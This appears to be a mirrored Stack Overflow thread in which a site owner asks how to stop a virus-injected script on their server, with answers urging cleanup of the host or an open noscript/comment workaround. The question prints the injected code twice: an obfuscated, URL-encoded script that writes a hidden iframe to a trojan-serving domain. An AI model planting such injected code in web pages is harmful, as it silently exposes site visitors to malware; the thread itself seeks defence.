Programatically stopping a specific chunk of code in html/javascript/css

不羁的心 提交于 2019-12-12 04:49:53

问题


The server that has my website on it also has a virus on it.

The virus injects the malicious code

<b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("BAs").appendChild(hKo)</script>

onto EVERY single page which is served, and it is being preprocessed by Apache or something similar to add it to the end of the file.

I created a test file, with the following code:

<html> 
<head> 
<title>Test HTML File</title> 
</head> 
<body> 
<h1>Test HTML File</h1> 
</body>
</html>

It isn't pretty, but it served its purpose.

When viewing the page in my browser, I get

<html> 
<head> 
<title>Test HTML File</title> 
</head> 
<body> 
<h1>Test HTML File</h1> 
<b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("BAs").appendChild(hKo)</script> 
</body> 
</html>

which can be viewed from www.sagamountain.com/testfile.html (warning, this page is infected)

I need to programmatically stop that div and that script from executing, as it is an iframe to a site with a trojan on it. HTML, CSS, or JS, I just need some way to prevent that JS from executing.

It is already display:none so you cannot see it, but how can I prevent the iframe from ever loading at all?

Thanks for the help! The unescape thing resolves to an iframe to http://ncccnnnc.cn/img/index.php which is clearly the source of my troubles. Don't go to that site!

EDIT: This is a followup to https://serverfault.com/questions/78439/my-website-is-infected-i-restored-a-backup-of-the-uninfected-files-how-long-wil/78459#78459


回答1:


I'm sorry that I can't answer your specific question, but I think that you're looking at this the wrong way. What you need to do is not strip out the virus-inserted html, what you need to do is talk to your web-host/sysadmin and strip out the virus.

Treating the symptoms won't cure the infection. Treating the disease, however, will also treat the symptoms as well as removing the virus.




回答2:


The file that is in your server is a php file look in the comments here.




回答3:


Cyber, if you have to wait on the server to be fixed by someone else, I'd say you should try ending your documents with an open <noscript> tag or open HTML comment tag.

You can't use Javascript to stop content that hasn't been rendered from doing so, unless you use document.write and one of the above tags (noscript/comment). Also you can't do anything by placing a script after, as it is already too late (the content is there already).

It is an ugly solution but should prevent your site visitors from experiencing the virus. It also makes your markup invalid, but any browser should be able to parse it and render it as you expect.

Best of luck with the server!



来源:https://stackoverflow.com/questions/1627780/programatically-stopping-a-specific-chunk-of-code-in-html-javascript-css

易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!